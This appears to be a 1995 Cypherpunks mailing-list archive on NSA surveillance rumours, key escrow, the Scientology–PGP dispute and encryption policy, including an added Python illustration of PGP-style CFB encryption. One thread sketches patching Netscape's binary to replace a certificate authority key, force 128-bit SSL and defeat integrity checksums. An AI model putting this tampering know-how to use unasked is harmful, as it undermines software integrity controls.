Stewart A. Baker, Steptoe & Johnson, US., moderator Stephen T. Walker, Trusted Information Systerns, Inc, US. Frank Sudia, Bankers Trust Company, US. 
Carmi Gressel and Itai Dror Fortress U & T Ltd., Israel 3:00-3:20 Break 3:20-4:00 Billing and Paying Over the Internet Dan Schutzer, Citibank, U.S. _______________________________________________________ Faculty Faculty Chair Dr Dorothy Denning Mr. Edward L. Allen Supervisory Special Agent Federal Bureau of Investigation Mr. Stewart Abercrombie Baker Partner Steptoe & Johnson Mr. David Balenson Senior Computer Scientist Trusted Information Systems, Inc. Mr. William E. Baugh, Jr. Assistant Director, Information Resources Division Dr. Ernest F. Brickell Vice President Bankers Trust Electronic Commerce c/o Sandia National Labs Applied Math Dept. Prof. James Chandler President National Intellectual Property Law Institute Dr. Dorothy E. Denning Professor Computer Science Department Georgetown University Mr. Peter Ford First Assistant Secretary, Security Division Attorney General's Department Australia Mr. Louis J. Freeh, Director Federal Bureau of Investigation Mr. Michael D. Gilmore Supervisory Special Agent Federal Bureau of Investigation Engineering Research Facility Mr. David J. Gould Under Secretary of State Overseas and Defence Secretariat Cabinet Office, London Mr. M. Blake Greenlee M. Blake Greenlee Associates, Ltd. Dr. Carmi Gressel Engineering Manager Fortress U & T, Ltd. Israel Mr. David Kahn Visiting Historian National Security Agency, and author, "The Codebreakers" Dr. Anatoly Lebedev President LAN Crypto, Ltd. Russia Mr. Mitsuru Iwamura Chief Manager Institute for Monetary and Economic Studies The Bank of Japan Mr. Ronald D. Lee General Counsel National Security Agency Mr. Yves Le Roux Central Engineering, Security Program Digital Equipment Corp. France Mr. Nick Mansfield Shell International Petroleum Maatschappij B.V. The Hague The Netherlands Mr. Michael R. Nelson Special Assistant, Information Technology White House Office of Science and Technology Policy Old Executive Office Building, Washington DC 20506 Mr. Henry H. Perritt, Jr.
Professor of Law Villanova University School of Law Villanova, PA 19085 Mr. Ira Rubinstein Senior Corporate Attorney Microsoft Corp Redmond, WA 98052 Dr. Dan Schutzer Vice President Citibank Dr. Frank Sudia Vice President BT Electronics Commerce Bankers Trust Co., New York Mr. Stephen T. Walker President Trusted Information Systems, Inc. _______________________________________________________ Location and Fees ICI '95 will be held at the National Intellectual Property Law Institute, 1815 Pennsylvania Ave., Washington, DC, third floor. Registration is $695 before September 1 and $795 thereafter ($395/495 for U.S. Government). Payment includes all conference materials, two lunches, and a cocktail reception. Cancellation Fees: All registration is subject to a $50 fee. Tuition will not be refunded if notice of cancellation is received after September 1, 1995, but a substitute attendee may be sent. Postmarks will not be considered in determining timeliness of receipt. Hotel Accommodations: A limited block of rooms has been reserved at the Wyndam Bristol. However, registrants must make their own hotel reservations and indicate that they are attending the International Cryptography Institute 1995. Room reservations may be made by calling or writing the Wyndam Bristol Hotel, 2430 Pennsylvania Ave., N.W. Washington, D.C. 20006 (202) 955-6000. CLE Credit: CLE credit in mandatory states will be applied for as requested. _______________________________________________________ Course Registration Form Name: Organization: Address: Phone: Fee: General U.S.
Gov't Before 9/1/95 $695 $395 After 9/1/95 $795 $495 Payment (check one) Check payable to The National Intellectual Property Law Institute _______ Master Card ________VISA Card # Expiration Date: Signature: Registration by Fax: 800-304-MIND Phone: 800-301-MIND 202-296 4098 202-842-48000 Mail Registration with payment to: The National Intellectual Property Law Institute 1815 Pennsylvania Ave., NW, Suite 300 Washington, DC 20006 _______________________________________________________ From perry at piermont.com Fri Sep 8 07:55:26 1995 From: perry at piermont.com (Perry E. Metzger) Date: Fri, 8 Sep 95 07:55:26 PDT Subject: Darren Reed: Re: NSA and the Internet. Message-ID: <199509081455.KAA07149@frankenstein.piermont.com> Forwarded from com-priv. Anyone out there have information they can use to confirm or deny any of this? .pm ------- Forwarded Message From: Darren Reed Subject: Re: NSA and the Internet. To: com-priv at lists.psi.com Date: Fri, 8 Sep 1995 17:36:11 +1000 (EST) Now that I've got it next to me... > I was reading a journal recently which mentioned the NSA were taking > an active role in monitoring the network at key points, such as FIX > East and West and MAE East and West. Can anyone comment on this (if > they're allows :) ? [...] To name some more names mentioned as being NAPs under surveillance: Pennsauken, NJ (Sprint); Chicago (AmeriTech/Bell Comms. Research); San Francisco, CA (Pacific Bell); CIX, CA (San Jose); SWAB, North Virginia (Bell Atlantic). There is a rather worrying quote in the article about NASA capturing data for the NSA. The column closes with a comparison to a case where the NSA was almost prosecuted by the US Justice Dept. in the '70s for anti-Vietnam War group surveillence. The article appeared in "Computer Fraud & Security", June 1995. 
American editor is: Charles Cresson Wood Information Integrity Investments Sausalito, CA, USA The article in question, titled "Puzzle Palace Conducting Internet Surveillance" is by Wayne Madsen of Virginia. No Internet E-mail address listed for either of the American contributors mentioned above. darren ------- End of Forwarded Message

From remailer at bi-node.zerberus.de Fri Sep 8 08:14:53 1995 From: remailer at bi-node.zerberus.de (Ford Prefect) Date: Fri, 8 Sep 95 08:14:53 PDT Subject: No Subject Message-ID:

NY Times, Sept 8, 1995. Intel Wins Contract to Develop World's Fastest Supercomputer By Lawrence M. Fisher San Francisco, Sept. 7 -- The Intel Corporation said today that it had won a contract from the Department of Energy to develop what it called the world's fastest supercomputer. The machine, to be built at an estimated cost of $45 million, would use 9,000 of Intel's forthcoming P6 microprocessors linked in a configuration known as massively parallel. In recent years, massively parallel computers using thousands of relatively inexpensive off-the-shelf chips have stolen the performance lead from traditional supercomputers like those made famous by Cray Research Inc., which use far fewer, but far more powerful processors. Intel said its new supercomputer would be the first to achieve the goal of calculating more than a trillion floating-point operations a second, known as a teraflop. The machine, to be kept at Sandia National Laboratories in Albuquerque, N.M., would be used by Department of Energy scientists to study a variety of complex problems, foremost among them nuclear weapons safety. "President Clinton is committed to ending underground nuclear testing," Victor Reis, Assistant Secretary for Energy Programs, said in a statement. "Computer simulation will be a principal means for insuring the safety, reliability and effectiveness of the U.S. nuclear deterrent.
We are embarking on a 10-year program to advance the state of high performance computing to meet national security objectives," he said. ... ------ From rsalz at osf.org Fri Sep 8 08:25:37 1995 From: rsalz at osf.org (Rich Salz) Date: Fri, 8 Sep 95 08:25:37 PDT Subject: Darren Reed: Re: NSA and the Internet. Message-ID: <9509081524.AA09579@sulphur.osf.org> I stopped reading com-priv a year+ ago. One of the "gadflies" back then (name escapes me -- one of the journalists, I think, but not Gordon Cook) said that at least the NJ NAP was moved at the last minute. He had proof of that. I don't remember that he had proof that it was moved at NSA request, although that was his claim. /r$ From patrick at Verity.COM Fri Sep 8 08:43:59 1995 From: patrick at Verity.COM (Patrick Horgan) Date: Fri, 8 Sep 95 08:43:59 PDT Subject: No Subject Message-ID: <9509081540.AA08797@cantina.verity.com> How much you want to bet that a first copy goes to virginia? Patrick > > NY Times, Sept 8, 1995. > > > Intel Wins Contract to Develop World's Fastest > Supercomputer > > By Lawrence M. Fisher > > > San Francisco, Sept. 7 -- The Intel Corporation said > today that it had won a a contract from the Department of > Energy to develop what it called the world's fastest > supercomputer. > > > The machine, to be built at an estimated cost of $45 > million, would use 9,000 of Intel's forthcoming P6 > microprocessors linked in a configuration known as > massively parallel. In recent years, massively parallel > computers using thousands of relatively inexpensive > off-the-shelf chips have stolen the performance lead from > traditional supercomputers like those made famous by Cray > Research Inc., which use far fewer, but far more powerful > processors. > > > Intel said its new supercomputer would be the first to > achieve the goal of calculating more than a trillion > floating-point operations a second, known as a teraflop. 
> The machine, to be kept at Sandia National Laboratories > In Albuquerque, N.M., would be used by Department of > Energy scientists to study a variety of complex problems, > foremost among them nuclear weapons safety. > > > "President Clinton is committed to ending underground > nuclear testing," Victor Reis, Assistant Secretary for > Energy Programs, said in a statement. "Computer > simulation will be a principal means for insuring the > safety, reliability and effectiveness of the U.S. nuclear > deterrent. We are embarking on a 10-year program to > advance the state of high performance computing to meet > national security objectives," he said. ... > > > ------ > > > _______________________________________________________________________ / These opinions are mine, and not Verity's (except by coincidence;). \ | (\ | | Patrick J. Horgan Verity Inc. \\ Have | | patrick at verity.com 1550 Plymouth Street \\ _ Sword | | Phone : (415)960-7600 Mountain View \\/ Will | | FAX : (415)960-7750 California 94303 _/\\ Travel | \___________________________________________________________\)__________/

From perry at piermont.com Fri Sep 8 08:51:30 1995 From: perry at piermont.com (Perry E. Metzger) Date: Fri, 8 Sep 95 08:51:30 PDT Subject: No Subject In-Reply-To: <9509081540.AA08797@cantina.verity.com> Message-ID: <199509081551.LAA07222@frankenstein.piermont.com>

Patrick Horgan writes: > How much you want to bet that a first copy goes to virginia? I'm not sure that the NSA actually would want machines on that scale these days. It's probably a lot more economical to throw your money into lots of much smaller machines and occasionally link them up via networks. Unlike physics simulation problems, most crypto problems don't involve tight communication between the parallel processors, so the extra expense that the high speed buses represent would end up being a waste.
Perry From stewarts at ix.netcom.com Fri Sep 8 09:11:00 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 8 Sep 95 09:11:00 PDT Subject: [NOISE] Re: Are booby-trapped computers legal? Message-ID: <199509081610.JAA08664@ix5.ix.netcom.com> At 04:52 PM 9/7/95 -0400, you wrote: >I am pretty sure that it is lawful to use deadly force to protect >property, in New Mexico. It's legal everywhere in the US - just some places make you contract out the dirty work to guys in blue suits... I agree with Sandy's comment that it makes much more sense to have any boobytraps designed to destroy data, rather than kill intruders. #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From hfinney at shell.portal.com Fri Sep 8 09:12:45 1995 From: hfinney at shell.portal.com (Hal) Date: Fri, 8 Sep 95 09:12:45 PDT Subject: GAK Hacks Message-ID: <199509081611.JAA05733@jobe.shell.portal.com> It is interesting to see that the proposed solutions to avoiding GAK hacks (URL:http://www.eskimo.com/~joelm/criteria.txt) largely revolve around certificate restrictions. Only keys signed with certificates from accepted escrow agencies can be used, and there is a "root certificate" used to authorize new escrow agencies. This is similar to some of the restrictions in the widely used Netscape web browser. It only accepts certificates from a limited number of agencies (actually only one which is public, the RSA spinoff VeriSign). This limitation is not based on escrow approval as in the GAK papers, but it ends up with something of the same results: interoperability with Netscape is only possible if you go through approved channels. And supposedly VeriSign does not make it too easy to get a certificate if you are not a straight-arrow corporate type. Maybe it would be good practice for a future GAK hack to try fixing these problems with Netscape. I could see two possibilities. 
One would be to create a patcher which would let you change the set of certificate authorities accepted by the browser. Currently the browser accepts at least one (an internal Netscape test CA) which is not needed by end users. Maybe its public key could be statically overwritten by the patch program with the public key of the replacement CA. This sounds simple and safe. The patch program can confirm that the data being changed matches the test CA. Another idea would be to patch the browser to emit full 128 bit SSL rather than the crippled 40 bit SSL it currently creates. This would be trickier as it requires code changes, but they may not be as bad as it seems. The 40 bit SSL is actually calculated as 128 bits internally. Then 88 bits are sent in the clear. We would need to skip sending those 88 bits, and also change the transmitted bytes which encode which encryption is being used. This shouldn't be too bad as it mostly would eliminate code or change some static values. The one thing I am unsure of is whether the 40 bit version sends the entire 128 bit SSL key in the RSA encrypted data (88 bits of which would be redundant, also being sent in the clear) or whether it sends only the 40 bits RSA encrypted. If the latter it would be somewhat more work to do the patch because now a larger value will have to be packed into the RSA record. If it is sending the 128 bits all the time then the patch would be much easier. This second patch is more advantageous for end users as it allows them to have strong encryption rather than the weak 40 bits which we have been breaking. The first would be a more direct demonstration of the difficulties of using certificate restrictions to limit functionality. The criteria.txt paper suggests checksumming the cryptographic routines to prevent patches like this, but generally I think such checksums can be defeated pretty easily. I doubt that Netscape currently has any such thing, though. 
Netscape says they will allow some form of user specification of certificates in a future version of the browser, but they have been saying this for quite some time and still it is not here. Hal From andrew_loewenstern at il.us.swissbank.com Fri Sep 8 09:16:08 1995 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Fri, 8 Sep 95 09:16:08 PDT Subject: Scientology tries to break PGP - and fails? Message-ID: <9509081615.AA03382@ch1d157nwk> Modemac writes: > Yet it seems that despite all their efforts to get what they want, > they can't break PGP - so they have to force Wollersheim to reveal > the key. > Mr. Wollersheim has stated that he will go to jail before he reveals > his encryption key. [...snip...] > Call this one: BIG WIN FOR PGP! Could this be it? The test case for forced key disclosure? The Scientologists seem very determined and already have a grudge against Wollersheim (according to a web page I saw Co$ owes him several million from a settlement). Has Co$ filed against Wollersheim over this yet? If this does go to court and forcing Wollersheim to reveal the key becomes a central issue, is this the test case "we" want? Is this a "BIG WIN FOR PGP!" or not? I can think of worse cases for this to come up in. I.E. a four horseman case. Here the party seeking forced disclosure of the key (Co$) is presumably already held in low esteem by much of the public (IMHO). I suppose how this will play in the media, if at all, depends on what the "church" thinks Wollersheim has hidden in his encrypted data files. It seems that the US media hasn't picked up much on the Scientology debacle yet... or am i wrong? andrew From trollins at hns.com Fri Sep 8 09:22:24 1995 From: trollins at hns.com (Tom Rollins) Date: Fri, 8 Sep 95 09:22:24 PDT Subject: Scientology tries to break PGP - and fails? In-Reply-To: <199509080312.UAA03808@netcom15.netcom.com> Message-ID: <9509081620.AA19816@dcn92.hns.com> > > News Flash! 
> > According to an informed source, the so-called "church" of Scientology is > trying to force Larry Wollersheim to give them his de-encryption code for > PGP. > > Larry Wollersheim is the director of FACTNet, a Colorado BBS that > specializes in distributing information about religious cults - > especially the Church of Scientology. Scientologists raided FACTNet > recently and seized its hardware and records, in a case that has > spread news of the Scientology wars all over the Internet. > > Scientology has been in possession of Larry Wollersheim's computer > records for quite a while now - at least three weeks, I believe. They > have been scanning it for what they claim to be "copyright violations." > Yet, their list of scanning criteria also includes a list of 34 names of > their critics and enemies, including a famous Netizen named "Rogue Agent." > > Yet it seems that despite all their efforts to get what they want, they > can't break PGP - so they have to force Wollersheim to reveal the key. > > Mr. Wollersheim has stated that he will go to jail before he reveals his > encryption key. > > Please forward this note to all interested parties. > > Call this one: BIG WIN FOR PGP! > > For more information on Scientology's war against the Internet, read the > many Web pages set up to cover the story. My own page, an "Introduction > to Scientology," is: > > http://www.tiac.net/users/modemac/cos.html > > It includes a link to the FACTNet Web page, as well as Ron Newman's > famous Web page: "The Church of Scientology vs. the Net." >

I took a look at the FACTNet web page. There is a file encrypted with PGP using the "-c" option. They are asking for people to help guess the Pass Phrase. Why would anyone bother if they had no clue that the file contained anything 'interesting'?
If this is the file that the Co$ is trying to crack, then what is being asked for is a pass phrase that can be handed to the Co$ that will pass the PGP valid key check and still not decrypt the data to anything useful. If Larry Wollersheim does have the valid key, it would be a simpler process to know what fake key to use and work it backwards through the MD5 to arrive at an ascii string to produce the fake key. Too bad this wouldn't be plausible for the secret ring. Perhaps PGP needs an option to specify the key in Hex and make the process easy.

From nobody at REPLAY.COM Fri Sep 8 09:48:43 1995 From: nobody at REPLAY.COM (Anonymous) Date: Fri, 8 Sep 95 09:48:43 PDT Subject: Info Warthogs Message-ID: <199509081648.SAA08525@utopia.hacktic.nl>

Future Information Warfare Study Available San Francisco, Sept. 6, 1995 -- Computer Security Institute's "Special Report on Information Warfare" describes how war might be fought in the 21st century. The report will appear in the fall issue of the Computer Security Journal, but is available now on request. Patrice Rapalus, director of Computer Security Institute (CSI), told Newsbytes, "In recent weeks, mass media organizations such as Time Magazine, the Washington Post, and National Public Radio have done stories on information warfare. This report is a timely, comprehensive and practical study on information warfare and its impact on our future." The report defines information warfare in contrast to simple computer crime, "A computer crime is an act that violates a law. It could be specifically targeted. It could be isolated, or it could be one element of an overall plan of attack. The conduct of information warfare, in contrast, is never random or isolated (and may not even violate a law). The term implies a concerted effort to utilize information as a weapon with which to wage war, whether on an actual battlefield or in economic, political, or social arenas."
Four aspects of information warfare are listed in the report: the electronic battlefield; infrastructure attacks; industrial espionage; and personal privacy attacks. "It is important to understand that the term 'information warfare' originated in the military and in its purest sense refers to the grim and dangerous business of real...country shattering war," says the report. Computer Security Institute is located in San Francisco, California, and is a wholly owned subsidiary of Miller Freeman Publishing. Miller Freeman publishes over fifty trade magazines including Dr. Dobbs Journal, Unix Review, and LAN Magazine. Computer Security Institute publishes, along with random studies like the "Special Report on Information Warfare," a monthly newsletter, a semi-annual Journal, an annual Buyers Guide, and an on-line bulletin board. To obtain an advance copy of "Special Report on Information Warfare," call 415-905-2310. ------

"Snooper" Software Digs Into Computers San Francisco, Sept. 6, 1995 -- Vias & Associates Inc. said it has introduced a new version of its "Snooper" system information utility. The author of the software said it is called Snooper because the program "snoops" around the computer to report its configuration and operating characteristics. John Vias of Vias & Associates said his company's program goes farther than other system information programs, including Microsoft's MSD (Microsoft System Detection), which is included in higher versions of the company's DOS operating systems. "I think Snooper is about the most accurate system information utility you can get," he said. "People say it's easy to use. It takes just one keystroke to go from the main screen to any other screen. It also has a built-in editor for 'autoexec' and 'config' files."
In all, Snooper can detect more than 150 details about a person's computer, including CMOS settings, hard drive type and capacity, any installed Micro Channel cards, fax-modems, memory types and amount available to the user, and video memory and type. Snooper is targeted to all markets, Vias officials said, including the average user, network administrators, consultants, and technicians. In the provided documentation is a wish list regarding new features for future versions of Snooper, including brand detection of additional non-Intel central processing units (CPUs), detection of local bus cards and tapes, and the ability to differentiate among different types of hard drives. Although Snooper can run in either DOS or Windows, Vias said the program works best in the DOS environment. In Windows, some of the software's reports must be disabled. In addition, some of the test results may be in error or unpredictable. Snooper requires an IBM PC or 100% compatible machine, with at least 256 kilobytes (KB) of RAM, a DOS with version 3.1 or higher, and some kind of video card. Snooper retails for around $39, and is available as both a full version and as shareware. Vias also said he is working hard on a Windows 95 version of Snooper. When the software was tested on a Windows 95 machine running in DOS mode, no problems were experienced. But running it in Windows mode made the program very unpredictable. -------

UK - PCMCIA Encryption Card Introduced London, Sept. 5, 1995 -- PPCP, a PCMCIA (Personal Computer Memory Card International Association) specialist, has begun shipping the Session Key, a PCMCIA Type II card from SCI Canada. According to John Nolan, the company's managing director, the card allows users to encrypt data on their PC hard disk, as well as across serial port linked devices, such as modems, using the DES algorithm. DES stands for Data Encryption Standard, a US-originated high security encryption system that is virtually unbreakable.
According to Nolan, the Session Key allows users to protect their data on a selective basis. "Many of the competing systems out there are only capable of encrypting the user's entire hard disk. That obviously protects the user's data, but if you forget your password, you have serious problems," he explained. "With the Session Key card, you create a new drive, the 'D' drive, to store the encrypted data. The card also allows data to be transmitted by modem in DES format. That allows a user maximum flexibility," he said. When used to encrypt data on a user's hard disk, once the Session Key is removed from the PCMCIA slot, all data on the disk that is encrypted is protected against unauthorized access. The encrypted data cannot be read or used without reinserting the UKP349 card. Nolan said that SCI has developed a second-generation version of the Session Key, which will be available later this year. "That version will use RSA encryption techniques, as well as Triple DES and a whole host of other encryption systems," he said. One of the problems with encryption devices like the Session Key is the fact that the US Government currently bans the export of certain types of encryption technologies, as well as restricts the sale of many technologies to "known parties." According to Nolan, this approval system can cause the company a few administrative problems. "We need to find out who is the actual end-user and pass their details back to SCI. My understanding is that the vetting is then carried out at a government level in Canada or the US," he said. He added that, apart from a short delay, typically a week or so before the card can be shipped to the customer, there is usually no problem.
Reader Contact: PPCP, tel +44-181-893-2277, fax +44-181-893-1182, Internet e-mail 100302.1470 at compuserve.com/PPCP950905/PHOTO) ------

From andrew_loewenstern at il.us.swissbank.com Fri Sep 8 09:55:01 1995 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Fri, 8 Sep 95 09:55:01 PDT Subject: Scientology tries to break PGP - and fails? Message-ID: <9509081654.AA03407@ch1d157nwk>

Tom Rollins writes: > If this is the file that the Co$ is trying to crack, then what the > is being asked for is a pass phrase that can be handed to the Co$ > that will pass the PGP valid key check and still not decrypt the > data to anything useful. Well, I don't have the PGP 'conventional' encryption format memorized, but there is probably a constant after the IV that is prepended to the data. The constant is used to determine if the key is correct. Since the conventional encryption runs in CFB mode and there is a full block of random IV at the beginning of the file, it is extremely unlikely that a key could be found that would properly decrypt only the first two blocks while leaving the rest unreadable... > If Larry Wollersheim does have the valid key. It would be a simpler > process to know what fake key to use and work it backwards through > the MD5 to arrive at an ascii string to produce the fake key. Not really. Even if you could find an IDEA key that would produce the desired output it would be hard to find a passphrase that would produce that key when hashed. One of the properties of one-way hash functions is that it is difficult to find a plaintext that produces a given hash. Hence the term 'one-way'.... Even if you did find a passphrase (which, if MD5 is strong, would require something like 2^64 operations), it would likely be long, have 8-bit chars, and would be impossible to type in. It would be tough to convince anyone that it was the real passphrase.
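The exchange above (Tom Rollins on a pass phrase that would "pass the PGP valid key check" and Andrew Loewenstern's reply on the IV, the check constant, CFB mode and the passphrase hash) is easier to follow with the pieces laid out in code. What follows is an added illustration written for this archive, not PGP's code and not PGP's exact file format: the passphrase is hashed with MD5 to a 128-bit key as Andrew describes, a one-block IV is followed by a constructed two-byte check constant (`CHECK`) and the data, and everything after the IV runs in CFB mode. IDEA is not in the Python standard library, so a truncated HMAC-MD5 stands in for the forward direction of the block cipher (an assumption, and not a real cipher; CFB never needs the inverse direction, which is why the stand-in works). The point the example makes is the one in the reply: the check field is decrypted by the same keystream as the data, so a wrong key fails the check and a key that passes it is also the key that decrypts the rest.

```python
"""Passphrase -> key, IV, in-band key check, CFB mode (constructed illustration)."""
import hashlib
import hmac
import os

BLOCK = 8              # 64-bit blocks, the same size as IDEA's
CHECK = b"\xa5\x5a"    # constructed 2-byte key-check constant placed after the IV


def passphrase_to_key(passphrase: str) -> bytes:
    """Derive the 128-bit session key the way the post describes: MD5 of the passphrase."""
    return hashlib.md5(passphrase.encode("utf-8")).digest()


def block_encrypt(key: bytes, block: bytes) -> bytes:
    """Forward block function. HMAC-MD5 truncated to one block is a keyed PRF that
    stands in for IDEA here (assumption); CFB only ever calls the cipher forward."""
    return hmac.new(key, block, hashlib.md5).digest()[:BLOCK]


def cfb_encrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    """Full-block CFB: keystream = E(previous ciphertext block), XORed into the data.
    A short final chunk simply uses a prefix of the last keystream block."""
    out, prev = bytearray(), iv
    for i in range(0, len(data), BLOCK):
        chunk = data[i:i + BLOCK]
        ct = bytes(p ^ k for p, k in zip(chunk, block_encrypt(key, prev)))
        out += ct
        prev = ct
    return bytes(out)


def cfb_decrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    """Mirror of cfb_encrypt; the ciphertext itself is what gets fed back."""
    out, prev = bytearray(), iv
    for i in range(0, len(data), BLOCK):
        chunk = data[i:i + BLOCK]
        out += bytes(c ^ k for c, k in zip(chunk, block_encrypt(key, prev)))
        prev = chunk
    return bytes(out)


def encrypt_file(passphrase: str, plaintext: bytes, iv=None) -> bytes:
    """Constructed layout: IV (one block, in the clear) || CFB(CHECK || plaintext).
    `iv` may be supplied for reproducible tests; otherwise it is random."""
    iv = os.urandom(BLOCK) if iv is None else iv
    key = passphrase_to_key(passphrase)
    return iv + cfb_encrypt(key, iv, CHECK + plaintext)


def decrypt_file(passphrase: str, blob: bytes):
    """Return (check_ok, plaintext_or_None).

    The check constant and the data are decrypted by one CFB stream under one key,
    so a wrong passphrase turns the check field into junk and nothing is returned,
    while a passphrase that passes the check is also the one that decrypts the rest.
    A 2-byte check still lets a wrong key slip through about once in 65536 tries,
    which is why such a check is a convenience for the user, not a security boundary.
    """
    iv, body = blob[:BLOCK], blob[BLOCK:]
    stream = cfb_decrypt(passphrase_to_key(passphrase), iv, body)
    if stream[:len(CHECK)] != CHECK:
        return False, None
    return True, stream[len(CHECK):]


if __name__ == "__main__":
    # Constructed sample input, longer than one block so feedback is exercised.
    sample = b"constructed sample plaintext, a bit longer than one block"
    blob = encrypt_file("correct horse battery", sample)
    print(decrypt_file("correct horse battery", blob))   # (True, sample)
    print(decrypt_file("not the passphrase", blob))      # (False, None)
```

Because the keystream depends on the key and on every preceding ciphertext block, there is no way to satisfy the check field in isolation: any candidate key is exercised against the whole file, and the passphrase behind that key must additionally be found as an MD5 preimage. That is the two-layer argument in the reply, and the code shows where each layer sits.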
andrew From Andrew.Spring at ping.be Fri Sep 8 10:02:18 1995 From: Andrew.Spring at ping.be (Andrew Spring) Date: Fri, 8 Sep 95 10:02:18 PDT Subject: GAK Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Brian Davis Wrote: > >I, of course, know of the "dislike" of GAK here. I am curious to know, >however, if the "dislike" is because government would have access under >any circumstances or if the primary worry is that government will cheat >and get access when most would agree that they shouldn't (either by the >judge "cheating" or a TLA stealing it). > >In other words ... if it took agreement by a review board composed of >non-LEA members of this list, would the escrow be acceptable?? > Looking at it simply as a cryptosystem, I'd have to vote no, since the security of the system can be "easily" (in a cryptographic sense) compromised. I feel safer knowing my privacy is protected by the laws of mathematics, instead of the laws of the USA. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBME9jIs3xoLPBSgtxAQEndAf/V9hJEyMIHe6/h2UmEWT4KH81Y/HuBHZr kuiHIRNFRGgsYKFIk72YGBltZvbPeWcX15RmGB6DO+91ecfmRMplW14RYAQyPpcx AGC3rQ966hZ/mRHRi7Ygtw1tbRKgbDAaNzx468TRZGwl2LxexpbxzOZoy2kMR18M +Kj6sLahlQxyTO6jx26uoj5uqmfdnxFAfjUDWAjLyhjH5x7XzqpJHQHKSFGIsdKY X1tw7IPPDUElXJkdx0aVMhOFwEen3XGm3qrx/kJRmnG7Q9WoAHE5xqOLSAHyYImd PaUT63Uzgop7euL4FROHqrIrlh70IPiWCk7t7OEwT8CS3MbbL/WgjQ== =hYy7 -----END PGP SIGNATURE----- From bdolan at use.usit.net Fri Sep 8 10:05:26 1995 From: bdolan at use.usit.net (Brad Dolan) Date: Fri, 8 Sep 95 10:05:26 PDT Subject: Hacking banking (fwd) Message-ID: ---------- Forwarded message ---------- Date: Fri, 8 Sep 95 15:21:00 UTC From: d.wiesner at genie.geis.com Subject: Hacking banking An interesting article appeared on Page B1 of the 9/7/95 San Francisco Examiner. Titled "Keystroke Cops," it discusses the FBI's new cyberswat team. 
In the midst of a routine discussion of whether law enforcement needs to keep up with cyberspace criminals, the following intriguing quote appeared. "Already, Fuentes said, federal authorities in New York are investigating whether programmers hired to write software for a financial institution may have left a 'back door' open in the program, one through which money may have been diverted to foreign bank accounts." Does anyone know what this federal investigation in New York is about? How about copying this note around and seeing what people can find out? David Wiesner ---- My pleasure, Dave. bd From andrew_loewenstern at il.us.swissbank.com Fri Sep 8 10:05:58 1995 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Fri, 8 Sep 95 10:05:58 PDT Subject: GAK Hacks Message-ID: <9509081705.AA03422@ch1d157nwk> Hal writes: > One would be to create a patcher which would let you change the > set of certificate authorities accepted by the browser. Currently > the browser accepts at least one (an internal Netscape test CA) > which is not needed by end users. Maybe its public key could be > statically overwritten by the patch program with the public key of > the replacement CA. This sounds simple and safe. The patch program > can confirm that the data being changed matches the test CA. This is an excellent idea, assuming the new CA's key will fit in the same amount of space or less than the test CA. How big is the test key? Of course, Netscape could decide to remove the test CA certificate from future versions of the browser. However, you could probably replace the Verisign certificate with your CA certificate and then have your CA sign the Verisign certificate so the browser can still use both. :-) > This second patch is more advantageous for end users as it allows > them to have strong encryption rather than the weak 40 bits which > we have been breaking. 
The first would be a more direct demonstration > of the difficulties of using certificate restrictions to limit > functionality. I don't think this is necessary as domestic versions of Netscape have already been exported and are available on non-U.S. FTP sites... > The criteria.txt paper suggests checksumming the cryptographic > routines to prevent patches like this, but generally I think such > checksums can be defeated pretty easily. I doubt that Netscape > currently has any such thing, though. It only makes it harder to patch. Anyone with a clue knows that there is no such software-only protection that can't be defeated. Even hardware/software dongle type protection can be defeated by altering the software to not check. andrew From frissell at panix.com Fri Sep 8 10:22:19 1995 From: frissell at panix.com (Duncan Frissell) Date: Fri, 8 Sep 95 10:22:19 PDT Subject: Car rentals, Driver's Licenses, Ecash, & Net Access Message-ID: <199509081721.NAA00705@panix.com> Lucky Green's reply to someone else motivated me to comment: >>Suppose you have acquired a million dollars worth of legal, above-board >>DigiCash dollars and you want to surreptitiously transfer this wealth to a >>below-board friend. Your friend creates a temporary anonymous account at an >>understanding bank. Y > >Won't work. Ecash, except as used for frequent flyer like points, will >exist in only *one* world wide e$ currency, issued by a single entity >composed of various major banks and subject to US laws. Getting Ecash >accounts will therefore be subject to the same legal requirements that >apply to normal US checking accounts. For the holiday weekend, I rented a car at a major agency in the state where I usually sleep. To secure the rental, I presented a driver's license from another state and a secured VISA card. The agency presented me with a car bearing the license plates of a Southern state far away from the rental location. 
In the past, this agency (one of the majors BTW) had given me a car registered in yet another Southern state for a week's rental bearing a registration that expired halfway through that week. No problems in any case. Interestingly enough, the agency refuses to rent to local citizens of the state where it is located and where I often sleep. My possession of a "foreign" DL makes it easier for me to rent cars. Money and imagination overcome many of the "social control" aspects of licensing and registration requirements. Now what this all has to do with transaction controls is the following. It is suggested that governments and private parties will cooperate in imposing absolute restrictions on people's ability to complete "unlicensed" transactions. Thus it is suggested that driving, possession of a motor vehicle, working for pay, having a bank account, having a phone account, having a net account can all be rigidly controlled. We've all read the stories about the DMV and how various states are pulling licenses for child support arrears, tax evasion, overdue library books, etc. The Feds have proposed a National SS# Database that would have to be consulted before the 60 Million people who annually change jobs would be allowed to do so. And it is easy to imagine that additional restrictions would soon be placed on job changes. After all, we don't want deadbeat dad-tax evading-library book hoarders working in this country, do we? Likewise the Bank Secrecy Act of 1970, et seq was supposed to end anonymous bank accounts. And a lot of the recent porn on the nets agitation has involved attacks on anonymity. Suggestions have been made for licensing net access. Finally, electronic check proposals are supposed to be traceable because those who open accounts will be identified. The readers of this list can apply what they already know about the difficulty involved in restricting net access to the analysis of these other existing and proposed restrictions.
